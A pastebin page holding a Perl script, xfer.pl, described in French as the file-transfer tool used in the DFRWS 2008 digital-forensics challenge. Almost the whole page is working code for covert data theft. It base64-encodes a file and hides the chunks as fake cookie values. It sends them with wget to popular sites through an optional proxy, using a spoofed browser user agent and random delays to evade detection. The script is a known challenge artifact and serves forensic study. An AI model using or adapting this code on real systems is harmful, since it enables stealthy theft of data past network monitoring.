a pastebin project

Paste Description for xfer.pl

Script perl utilisé pour le transfert de fichier par Steve Vogon dans le challenge d'inforensique DFRWS 2008.

xfer.pl

  1. #!/usr/bin/perl
  2. #
  3. use strict;
  4. use warnings;
  5. use MIME::Base64;
  6. use vars qw/@urls/;
  7.  
  8. my $user_agent = "Mozilla/5.0 (X11; U; Linux i686; en-US) Gecko/20071126";
  9. #my $proxy_ip = "219.93.175.67:80";
  10. @urls = ( "http://youtube.com/", "http://www.google.com/search?hl=en&q=pig+latin", "http://www.idioma-software.com/pig/pig_latin.html", "http://www.yahoo.com/", "http://mail.yahoo.com/", "http://www.myspace.com/", "http://vids.myspace.com/index.cfm?fuseaction=vids.individual&VideoID=23886700", "http://youtube.com/", "http://youtube.com/watch?v=ZiRHyzjb5SI", "http://youtube.com/watch?v=1RUFBGDvsy0", "http://www.google.com/search?hl=en&q=juicy+fruit", "http://www.wrigley.com/wrigley/products/pop_juicy_fruit.asp", "http://www.amazon.com/Juicy-Fruit-Mtume/dp/B0000025UL", "http://www.facebook.com/", "http://www.live.com/", "http://search.live.com/results.aspx?q=hurricane", "http://www.ebay.com/", "http://books.ebay.com/", "http://photography.ebay.com/", "http://crafts.ebay.com/", "http://en.wikipedia.org/wiki/Main_Page", "http://en.wikipedia.org/wiki/Lee_Smith_\%28baseball_player\%29", "http://en.wikipedia.org/wiki/Lee_Smith_\%28baseball_player\%29&action=edit", "http://www.msn.com/", "http://www.slate.com/id/2179838/?GT1=10733", "http://mail.live.com/", "http://costarica.en.craigslist.org/rfs/", "http://costarica.en.craigslist.org/apa/");
  11.  
  12. my @send_data;
  13. my $inputfile;
  14. my $chunk_size = 1236;
  15.  
  16.  
  17. sub encoder {
  18.  
  19.         open (F, "<", $inputfile) or die "Couldn't open $inputfile\n\n";
  20.         #don't want to break into recognizable base64 line lengths, so set $eol empty
  21.         my $eol = "";
  22.         local $/ = undef;
  23.         my $tmp = encode_base64( <F>, $eol );
  24.         close (F);
  25.        
  26.         return chunker( $tmp );
  27. }
  28.  
  29. sub chunker {
  30.  
  31.         my $template = "A$chunk_size " x (length($_[0])/$chunk_size);
  32.         $template .= "A*";
  33.         #print "Template is: $template \n";
  34.         my @temp = unpack("$template", $_[0]);
  35.         my $i = 0;
  36.         foreach my $chunk (@temp) {
  37.                 $i++;
  38.                 if ($i % 3 == 0) { $chunk = "RMID=" . $chunk; next;}
  39.                 if ($i % 2 == 0) { $chunk = "Sessid=" . $chunk; next;}
  40.                 else {$chunk = "CVal=" . $chunk;}
  41.                
  42.                 }
  43.         #print "Chunked array is : @temp \n";
  44.        
  45.         return @temp;
  46.  
  47. }
  48.  
  49. sub fluff_urls {
  50.  
  51. my $t = 0;
  52. until ( (scalar @urls) >= (scalar @send_data) ) {
  53.         $urls[$#urls+1] = $urls[$t];
  54.         $t++;
  55.         }
  56.        
  57. }
  58.  
  59. sub ship_data {
  60.  
  61.         my $i = 0;
  62.  
  63.         # $proxy_ip can specify a non-standard port, just edit the variable with ip:port syntax
  64.         # however, this doesn't work with separate system() calls as is. better to set in parent
  65.         # shell.
  66. #       system ('env http_proxy="http://$proxy_ip"');
  67.  
  68.         foreach my $data_chunk (@send_data) {
  69.        
  70.                 `wget -q --no-cookies --proxy=on --header=\"Cookie: $data_chunk\" --user-agent=\"$user_agent\" -O - $urls[$i]`;
  71.                 $i++;
  72.                 sleep 12;
  73.                 sleep int(rand(40));
  74.  
  75.                 }
  76. }
  77.  
  78. $inputfile = $ARGV[0];
  79.  
  80. print "Preparing $inputfile for transmission ......\n\n";
  81.  
  82. @send_data = encoder();
  83.  
  84. #now make sure we have enough URL requests to embed data chunks
  85. fluff_urls();
  86.  
  87. print "Sending now. Patience please ....\n";
  88.  
  89. ship_data();
  90. #       foreach my $data_chunk (@send_data) {
  91. #       print "Chunk is: $data_chunk \n\n";
  92. #       }
  93.        
  94. print "Data transmission complete. Exiting.\n\n";
  95.  
  96.  
  97.  
  98. # $i = scalar @urls;
  99. # print "URLS after number: $i";
  100. #
  101. # print @urls;
  102. #
  103. # Start sending the data out
  104. #

advertising

Create a Paste

Please enter your new post below (or upload a file instead):





Please note that information posted here will not expire by default. If you want it to expire, please set the expiry time above. If it is set to expire, web search engines will not be allowed to index it prior to it expiring. Items that are not marked to expire will be indexable by search engines. Be careful with your passwords.

worth-right worth-right
fantasy-obligation